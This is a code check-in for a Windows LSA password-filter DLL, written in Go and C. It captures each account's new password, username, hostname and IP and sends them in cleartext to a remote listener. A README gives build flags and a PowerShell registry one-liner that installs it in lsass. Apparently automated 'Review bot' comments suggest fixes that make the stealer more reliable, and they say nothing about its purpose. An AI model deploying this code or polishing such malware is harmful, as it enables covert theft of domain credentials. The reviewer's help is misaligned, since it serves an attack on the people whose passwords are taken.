Windows Password Filter



Check-in [f2dea56b19]


Overview
Comment:Initial Commit
SHA3-256: f2dea56b197fa698723910bfec765806ce9c55c61cedf24ad7a0124be9ce3f3c
User & Date: brimstone 2019-06-07 00:51:53
Context
2019-06-07
01:02
Update README to look prettier check-in: c1da28af1e user: brimstone tags: trunk
00:51
Initial Commit check-in: f2dea56b19 user: brimstone tags: trunk
00:20
initial empty check-in check-in: f37bd2c91b user: brimstone tags: trunk
Changes

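--- /dev/null
+++ b/.fossil-settings/ignore-glob
@@ -0,0 +1,1 @@
+/filter.h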

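--- /dev/null
+++ b/Makefile
@@ -0,0 +1,10 @@
+.PHONY: filter.dll
+filter.dll:
+	rm -f filter.dll
+	GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared
+	x86_64-w64-mingw32-objdump -p filter.dll | grep InitializeChangeNotify
+	x86_64-w64-mingw32-objdump -p filter.dll | awk '/Ordinal\/Name Pointer/,/^$$/'
+
+.PHONY: clean
+clean:
+	rm -f filter.h filter.o filter.dll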
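Review bot: The `go build` line in the `filter.dll` recipe never passes `-ldflags`, so every DLL this target produces keeps the compiled-in default of `127.0.0.1:4444` for `remote` in filter.go, and the receiver address the README talks about can only be set by bypassing the Makefile. Expose it as a variable using the `-X` form the linker understands: `REMOTE ?= 127.0.0.1:4444` at the top and `GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags "-X main.remote=$(REMOTE)"` in the recipe. The README's `-ldflags 'main.remote=...'` omits `-X` and is not valid linker-flag syntax, so it would not set the variable either. The two objdump lines are a useful post-build check that the DLL actually exports the LSA entry points, but grepping only for `InitializeChangeNotify` does not prove `PasswordFilter` and `PasswordChangeNotify` are present; grep for all three, or fail the build if any is missing.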

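--- /dev/null
+++ b/README.md
@@ -0,0 +1,31 @@
+win-pass-filter
+===============
+
+_stolen from https://github.com/iDigitalFlame/redteam-tools_
+
+This is a windows LSA password filter that sends the new password to an IP of
+your choosing.
+
+Build
+-----
+
+Simply build for windows with CGO enabled and the appropriate receiver listing
+port.
+```
+GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags 'main.remote=192.168.0.100:4444'
+```
+
+
+Install
+-------
+
+Copy the `filter.dll` to somewhere like `c:\windows\system32\idk.dll` and
+install with powershell
+```
+powershell -com "$a='idk';$b=(Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages').'Notification Packages'; Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value ""$b`r`n$a"""
+```
+
+If you change the name of the dll in `c:\windows\system32` then also update the
+`$a` variable.
+
+Reboot when finished.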

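--- /dev/null
+++ b/extra.go
@@ -0,0 +1,22 @@
+package main
+
+/*
+#include <windows.h>
+#include <ntsecapi.h>
+
+CRITICAL_SECTION cs;
+
+__declspec(dllexport) BOOL NTAPI InitializeChangeNotify(void) { return TRUE; }
+
+__declspec(dllexport) NTSTATUS NTAPI PasswordChangeNotify(PUNICODE_STRING UserName, ULONG RelativeId, PUNICODE_STRING NewPassword) {
+    EnterCriticalSection(&cs);
+    HaGotEm(UserName->Length, (char*)(UserName->Buffer), NewPassword->Length, (char*)(NewPassword->Buffer));
+    LeaveCriticalSection(&cs);
+    return 0;
+}
+__declspec(dllexport) BOOL NTAPI PasswordFilter(PUNICODE_STRING AccountName, PUNICODE_STRING FullName, PUNICODE_STRING Password, BOOL SetOperation) {
+    HaGotEm(AccountName->Length, (char*)(AccountName->Buffer), Password->Length, (char*)(Password->Buffer));
+    return TRUE;
+}
+*/
+import "C"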
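Review bot: `cs` is declared on line 7 of the preamble but never initialized — `InitializeChangeNotify` on line 9 just returns TRUE — so the `EnterCriticalSection(&cs)` in `PasswordChangeNotify` operates on a zero-filled CRITICAL_SECTION, which the Win32 API documents as undefined behaviour; because this code runs inside lsass.exe, a hang or fault here is a host-wide availability problem, not just a failed call. Either initialize it in the hook LSA provides for that purpose, `__declspec(dllexport) BOOL NTAPI InitializeChangeNotify(void) { InitializeCriticalSection(&cs); return TRUE; }`, or drop the lock entirely: `HaGotEm` touches no shared state, and `PasswordFilter` on line 17 already calls it without taking the lock, so the current code is inconsistent either way. Both hooks forward the same credential, so one change is reported twice (the candidate in `PasswordFilter`, which Windows calls before the change is committed, and the accepted value in `PasswordChangeNotify`); if that is intentional, say so in a comment, since a reader will otherwise assume one of them is a mistake. `PasswordFilter` also returns TRUE unconditionally, which is correct for a pass-through filter but deserves a one-line comment so nobody mistakes it for policy enforcement.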

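--- /dev/null
+++ b/filter.go
@@ -0,0 +1,79 @@
+package main
+
+////// #cgo LDFLAGS: -lwinmm
+import "C"
+
+import (
+	"fmt"
+	"net"
+	"os"
+	"time"
+)
+
+func getIPAddress() string {
+	i, err := net.Interfaces()
+	if err != nil {
+		return "<nil>"
+	}
+	for _, a := range i {
+		if a.Flags&net.FlagUp == 0 || a.Flags&net.FlagLoopback != 0 {
+			continue
+		}
+		if n, err := a.Addrs(); err == nil {
+			for _, ad := range n {
+				var r net.IP
+				switch ad.(type) {
+				case *net.IPNet:
+					r = ad.(*net.IPNet).IP
+				case *net.IPAddr:
+					r = ad.(*net.IPAddr).IP
+				default:
+					continue
+				}
+				if r.IsLoopback() || r.IsUnspecified() || r.IsMulticast() || r.IsInterfaceLocalMulticast() || r.IsLinkLocalMulticast() || r.IsLinkLocalUnicast() {
+					continue
+				}
+				if p := r.To4(); p != nil {
+					return p.String()
+				}
+				return r.String()
+			}
+		} else {
+			return "<nil>"
+		}
+	}
+	return "<nil>"
+}
+
+var remote = "127.0.0.1:4444"
+
+//export HaGotEm
+func HaGotEm(l C.int, u *C.char, n C.int, p *C.char) C.int {
+	a := []byte(C.GoStringN(u, l))
+	y := []byte(C.GoStringN(p, n))
+	e := make([]rune, l/2)
+	k := make([]rune, n/2)
+	for i := 0; i < len(a); i += 2 {
+		e[i/2] = rune(a[i])
+	}
+	for i := 0; i < len(y); i += 2 {
+		k[i/2] = rune(y[i])
+	}
+	h, err := os.Hostname()
+	if err != nil {
+		h = ""
+	}
+	x, err := net.DialTimeout("tcp", remote, time.Duration(5*time.Second))
+	if err != nil {
+		return C.int(-1)
+	}
+	defer x.Close()
+	d := []byte(fmt.Sprintf("[%s:(%s)%s:%s]\n", h, getIPAddress(), string(e), string(k)))
+	if _, err := x.Write(d); err != nil {
+		return C.int(-1)
+	}
+	x.Close()
+	return C.int(0)
+}
+
+func main() {}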
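Review bot: `HaGotEm` bounds the connect with `DialTimeout` on line 67 but puts no deadline on the connection afterwards, so the `x.Write(d)` on line 72 can block indefinitely if the receiver accepts and then stalls — and since LSA calls `PasswordFilter`/`PasswordChangeNotify` synchronously, that blocks password changes inside lsass.exe for as long as the peer likes. Add `x.SetDeadline(time.Now().Add(5 * time.Second))` immediately after the dial, and drop the explicit `x.Close()` on line 75, which the `defer` on line 70 already performs. The even-byte loops on lines 56-61 keep only the low byte of each UTF-16 code unit (`Length` is a byte count, hence the `/2`), so any character outside Latin-1 is silently mangled; `utf16.Decode` over the buffer viewed as `[]uint16` is the correct conversion. Separately, the payload is hostname, address, account and password in cleartext over plain TCP, and `getIPAddress` returns the literal string `"<nil>"` as its failure sentinel — both should at least be documented, since the `[host:(ip)user:pass]` format on line 71 is a wire contract with whatever listens on `remote`. The `////// #cgo LDFLAGS: -lwinmm` line on line 3 is commented out (cgo only honours `#cgo` at the start of a preamble line), so it has no effect and should be deleted if the link flag is not needed.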